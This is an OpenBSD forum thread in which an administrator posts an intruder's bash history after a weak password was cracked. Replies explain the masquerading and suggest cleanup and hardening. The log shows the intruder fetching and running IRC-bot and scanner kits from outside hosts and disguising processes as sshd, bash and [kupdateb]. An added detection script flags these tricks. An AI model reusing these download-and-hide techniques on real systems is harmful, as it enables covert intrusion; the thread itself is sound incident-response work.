DaemonForums  

#1
30th June 2009
knasbas
weak password=broken

I just found out that a user had a weak password and it was broken. How do I trace what a user has been doing?
I only see brief info in .bash_history (below).
Any help at all is welcome. I've changed the password and deleted the 2 directories I've found.
Not a single hit on robotbsd in Google makes me a bit worried.
Code:
ls
ps 'ux
uname
uname -a
uptime
wget
w
passwd
ls
uname -a
fetch www.psybnc.net/psyBNC-2.3.2-7.tar.gz
wget
wget www.psybnc.net/psyBNC-2.3.2-7.tar.gz
ls
tar xvf psyBNC-2.3.2-7.tar.gz
tar xzvf psyBNC-2.3.2-7.tar.gz
ls
cd psybnc
ls
ls
pico menuconf
pico config.h
ls
pico psybncchk
ls
pico CHANGES
make
ls
pico psybnc.conf
ls
rm -rf salt.h
mv psybnc sshd
export PATH="."
sshd
ps -ux
ls
exit
ps-ux
ps -ux
ls
kill -9 29089
ps -ux
kill -9 28097
ps -ux
ls
cd psybnc
ls
pico psybnc.conf
ls
sshd
export PATH="."
sshd
ps -ux
ls
exit
ls
-ps -ux
ls
ps -ux
ls
kill -9 12813
ls
ps -ux
ls
cd psybnc
ls
mv sshd bash
./bash
ps -ux
kill -9 12169
ls
cd ..
ls
wget badry.uv.ro/robotlinux.tgz
ls
tar xvf robotlinux.tgz
cd ". .".l
ls
pico mech.set
./[kupdateb]
[kupdateb]
export PATH="."
[kupdateb]
ls
exit
ls
ls -a
cd /var/tmp
mkdir roxy
cd roxy/
ls
ls -a
wget badry.uv.ro/robotbsd.tgz
ls
tar xvf robotbsd.tgz
ls
cd ". .".b
ls
ls
pico m.session
ls
./[kupdateb]
chmod +x *
ls
[kupdateb]
./
[kupdateb]
ls
cd ..
ls
ls
exit
ls
ps -ux
cd psybnc
ls
cd ..
ls
rm -rf psybnc
ls
tar xvf psyBNC-2.3.2-7.tar.gz
tar xzvf psyBNC-2.3.2-7.tar.gz
ls
cd psybnc
ls
make
ls
mv psybnc bash
./bash
ps -ux
ls
w
uname -a
uptime
exit
ls
ps -ux
ls -a
exit
ps -ux
uname -a
uptime
ls -a
ls -a
exit
ps -ux
uname -a
ls -a
cd ". .".l
ls
./[kupdateb]
ls
cd /var/tmp
ls
ls
wget badry.uv.ro/robotbsd.tgz
ls
tar xvf robotbsd.tgz
ls
cd ". .".b
ls
./[kupdateb]
ls
ps -ux
uname -a
uptime
ls
cd ..
ls
ls
wget bucus.tvn.hu/wtf.tgz
ls
ftp
tar xvf wtf.tgz
ls
cd wtf
ls
./a 21.21
rm -rf a1
rm -rf scam
./a 53.21
exit
#2
1st July 2009
Carpetsmoker

Some programs were executed.
psybnc is ``an easy-to-use, multi-user, permanent IRC-Bouncer''; not sure what it means.
It was executed under the name sshd to hide it.

I don't know what the other files are, but the filenames ``robotbsd.tgz'' and ``robotlinux.tgz'' don't sound very good; it was executed under the name ./[kupdateb] to hide it.

The intruder never had root access, right? (Through sudo).

If so, you can probably undo most harm by making sure there is nothing in this user's crontab and by rebooting the machine; anything the intruder executed will be shut down.
__________________
UNIX was not designed to stop you from doing stupid things, because that would also stop you from doing clever things.
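The hiding tricks pointed out above (psybnc renamed to sshd and bash, the bots started as [kupdateb], the ". ." directories in the history) can be checked for mechanically. The following is an added example, not part of any post in this thread; it assumes the `ps -axo user,pid,command` column layout, and the sample process list, the user alice and the function names are constructed.

```shell
#!/bin/sh
# Added example, not from the thread. Heuristics only; sample data is constructed.

# Read "USER PID COMMAND ..." lines, as printed by `ps -axo user,pid,command`,
# and print the processes that match the hiding tricks seen in the history.
flag_masquerade() {
    awk '
    $1 == "USER" { next }                       # ps header line
    {
        cmd = $3; base = cmd
        sub(/.*\//, "", base)                   # name without directory part
        why = ""
        if ($1 != "root" && base ~ /^\[.*\]$/)
            why = "kernel-thread style name, not owned by root"
        else if ($1 != "root" && base == "sshd")
            why = "sshd daemon name under an ordinary user"
        else if (cmd ~ /^\.\//)
            why = "started by relative path"
        if (why != "") printf "%s %s %s: %s\n", $2, $1, cmd, why
    }'
}

# List directories whose names start with a dot and contain a space
# (the history shows `cd ". .".l`, i.e. a directory named ". ..l").
find_odd_dirs() {
    find "$@" -xdev -type d -name '.* *' -print 2>/dev/null
}

# Constructed sample in `ps -axo user,pid,command` layout.
sample_ps() {
    cat <<'EOF'
USER   PID COMMAND
root   4512 /usr/sbin/sshd
alice  9011 sshd: alice@ttyp0 (sshd)
alice  9012 -bash
alice  3101 sshd
alice  3102 ./bash
alice  3103 [kupdateb]
EOF
}

sample_ps | flag_masquerade
# On a live host (as root): ps -axo user,pid,command | flag_masquerade
#                           find_odd_dirs /home /tmp /var/tmp
#                           crontab -u USER -l
```

A renamed binary that is started through PATH="." under an ordinary name such as bash is not caught by name alone, so the directory and crontab checks still matter.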
#3
1st July 2009
s2scott

Quote:
Originally Posted by knasbas
How do I trace what a user has been doing?

On the simple side, using ...

tcpdump and/or pftop (if installed)

you can "watch" your box's actual network traffic to see who's NOW talking to you and with whom you're talking. If you cannot account for the sessions you see, then you are OPERATING as a compromised host.

The very nature of an IM/IRC "bot" would suggest that you're going to see lots and lots of sessions.

In the bash history, where you see
Code:
./a 21.21
are obfuscated and powerful system calls, where the hacker knows what 21.21 is.

/S
__________________
Never argue with an idiot. They will bring you down to their level and beat you with experience.
#4
1st July 2009
Beastie
The Hungarian link is still functional, so go get wtf.tgz. It's a real script kiddy's toolkit. There are even word dictionaries. It also has the a shell script that was copied to the compromised account's directory. It may help you trace any changes made.

For the next time (I truly hope there won't be any), please enforce strict password policies, like setting minimum length, with both low and uppercase alphanumeric sets.

And check the handbook, part III (System Administration), especially chapters 13 to 17. There are many good security tips.
__________________
May the source be with you!

Last edited by Beastie; 1st July 2009 at 06:11 PM.
#5
1st July 2009
jggimi

Quote:
Originally Posted by Beastie
...And check the handbook...

Wrong OS, Beastie.

I don't worry much about strong/weak passwords, knasbas. That's because I don't use password authentication at all with sshd. (I only permit public key or S/Key authentication.)
#6
1st July 2009
BSDfan666

What handbook, Beastie? Aren't you a little lost?
  • Use public key authentication.
  • Punish the user responsible for using a weak password, i.e. by locking the account... or waterboarding.
Hope that helps..
#7
1st July 2009
Beastie

Ah sorry for that. I KNEW I was in the OpenBSD section and yet I was still thinking about the FreeBSD handbook.

However, most topics there are common to both systems (and many others), some are general tips that can apply to any situation and some provide general information about the use and configuration of third-party software or software common to both systems.
__________________
May the source be with you!